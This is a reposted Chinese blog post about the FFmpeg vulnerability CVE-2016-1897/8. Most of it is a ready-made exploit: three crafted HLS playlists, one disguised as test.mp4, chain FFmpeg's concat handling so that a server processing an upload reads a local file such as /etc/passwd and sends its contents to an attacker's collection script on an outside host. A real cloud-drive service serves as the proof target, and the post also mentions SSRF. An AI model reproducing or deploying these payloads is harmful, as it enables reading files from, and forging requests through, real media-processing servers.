CVE-2016-1897/8 - FFMpeg vulnerability analysis

2019独角兽企业重金招聘Python工程师标准>>>

 

Vulnerability exploit methods are as follows:

一共4个文件:



comm.php (接收用的 也可以用监听一个端口)
 

code 区域

header.m3u8 (视频格式文件)


 

code 区域

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:,

http://www.u-url.org/exp/movie/comm.php?x=

remote.m3u8 （第二次转发的）


 

code 区域

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:http://www.u-url.org/exp/movie/header.m3u8|http://baidu.com

#EXT-X-ENDLIST

 

code 区域

http://baidu.com  也可以换成 本地资源文件： /etc/passwd

test.mp4 （最终上传触发）


 

code 区域

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:http://www.u-url.org/exp/movie/remote.m3u8

#EXT-X-ENDLIST

 

漏洞证明：

一切准备号了之后就上传test.mp4到360云盘上去。


 

 

code 区域

root:x:0:0:root:/root:/bin/bash

也可以ssrf

Detailed content link:

https://habrahabr.ru/company/mailru/blog/274855/

 

转载于:https://my.oschina.net/u/2393235/blog/674500